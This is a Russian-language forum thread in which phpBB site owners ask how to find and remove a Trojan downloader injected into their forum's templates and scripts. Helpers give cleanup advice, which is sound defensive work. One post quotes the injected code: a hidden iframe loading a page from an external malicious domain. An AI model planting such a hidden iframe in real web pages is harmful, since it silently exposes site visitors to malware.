Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[владимир1983]

после его чистки

Поиск по файлам выполнял по известному вредоносному коду?

какие файлы посмотрет

Если

"Найти пользователя"

То смотри memberlist_search.html
И читай [FAQ] Шаблон форума, CSS и html, где что "ковырять"

[pavelkim]

Поиск по файлам выполнял по известному вредоносному коду?

еще при чистке форума. Это было около месяца назад. Сам код не сохранил.

Просмотр файла memberlist_search.html ничего не дал. Так же смотрел forum_fn.js - тоже ничего не нашел. Не могу приложить их к сообщению. В ответ: Закачка была отклонена, так как вложение было определено как возможная атака. Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?

[Sheer]

Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?

Естественно. При закачке какого файла?

[pavelkim]

Пробовал и .html и .txt
Каждый раз присутствовала угроза атаки при закачке.

Добавлено спустя 9 минут 44 секунды:
! Нашел трояна в следующих файлах:
simple_footer.html и simple_header.html

[TheRain]

Здравствуйте.
Захожу сегодня на форум к себе и вижу что nod ругается. Кинулся разбираться. В итоге оказалось что каким-то образом оказались заражены вирусом(?) .js файлы.
Firebug показал вот такой кусок кода на страницах:

Код: Выделить всё

<div style="z-index: -10000; visibility: hidden; position: absolute; width: 50px; height: 50px;">
<iframe width="50" scrolling="no" height="50" frameborder="0" src="http://activatedreplacing.is-very-evil.org/index.php?28d9000e56c2a63080ff89c6f5357591">
</div> 

Подробнее об этом и о мерах лечения здесь.
Мне помогло.

[lucifer]

....

[Sheer]

Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

Вранье.

А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?

Нет.

Доступ к серверу не имею. Есть возможность удалить трояна через интернет?

Нет.

[владимир1983]

Хостер сказал

Пускай укажет на уязвимость.
В phpbb нет известных уязвимостей!

[lucifer]

....

[владимир1983]

Как это устранить?

Прочитать эту тему.
Используя FTP клиент найти вредоносный код и удалить его.

[Sheer]

Необходимо просканировать сайт вместе с форумом на вирусы?

Просканируйте. Только как вы это сделаете, если

Доступ к серверу не имею

[lucifer]

....

[Garret_Dark]

где он может засесть этот код?

Искать последние измененные файлы по дате. А в них искать код который видете на странице (Код трояна), меняете зараженные файлы на файлы из бэкапа (Если не сможете корректно удалить вредоносный код) или вообще все файлы восстанавливаете из бэкапа.
Ищите шелл - "левый" файл, опять таки файл по дате создания

откуда мог взяться?

Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.

[lucifer]

....

[Garret_Dark]

не имея доступа к серверу?

Хмм... Пропустил этот момент.
Не имея доступа к серверу, через админку можно править только файлы шаблона...
Я считаю, что код, скорее всего, появился после очистки кэша (Причем тут почтовый адрес то? Это просто запись в БД) и в этом случае как раз таки код находится в шаблоне, но искать его придется ручками, скорее всего он в overall_header.html если вообще в шаблоне...